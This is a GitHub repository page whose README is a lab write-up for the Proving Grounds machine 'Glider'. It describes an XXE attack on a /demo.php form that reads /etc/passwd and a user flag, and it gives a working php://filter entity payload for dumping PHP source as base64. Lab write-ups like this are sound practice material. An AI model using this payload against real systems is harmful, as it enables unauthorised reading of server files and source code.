Skip to content

h8handles/PG-Practice-Glider-XEE-XXE-PoC

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
README.md
README.md
 
 
exploit.py
exploit.py
 
 

Repository files navigation

Machine - Glider

This is a machine I have completed in the past with an XXE / XEE XML External Entity

demo.php

When filling out the form box at /demo.php we are able to do XEE / XML related attack

Pasted image 20240719111338

using HackTricks we are able to get the /etc/passwd file to display

Pasted image 20240719111504

We are also able to obtain the users flag steven

Pasted image 20240719111621

We can use this to look at source code of the webpage using php filters and converting to base64

Read the src luke

The payload

<!DOCTYPE replace [<!ENTITY example SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/demo.php"> ]>

<users><name>&example;</name>

Pasted image 20240719111931

copy and paste the output to a file:

cat demo.b64| base64 -d > demo.php

Pasted image 20240719112014

The Plan

We will be using python to get back the base64 of the source code of the web page

Libraries

  • base64
  • requests
  • beautifulsoup
  • argparse

About

PG-Practice Glider XEE/XXE PoC

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages